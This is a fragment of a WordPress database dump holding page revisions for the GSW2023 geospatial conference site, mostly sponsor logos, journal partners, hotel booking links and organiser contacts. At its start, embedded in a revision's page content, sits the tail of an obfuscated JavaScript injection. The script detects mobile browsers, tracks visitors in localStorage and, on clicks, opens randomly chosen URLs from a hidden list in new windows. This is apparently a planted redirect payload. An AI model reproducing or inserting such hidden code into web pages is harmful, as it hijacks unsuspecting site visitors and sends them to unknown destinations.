|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:28:16','2023-08-26 20:28:16','',3066,'https://gsw2023.com/?p=5410',0,'revision','',0),
(5413,1,'2023-08-26 20:32:24','2023-08-26 20:32:24','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\">><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is 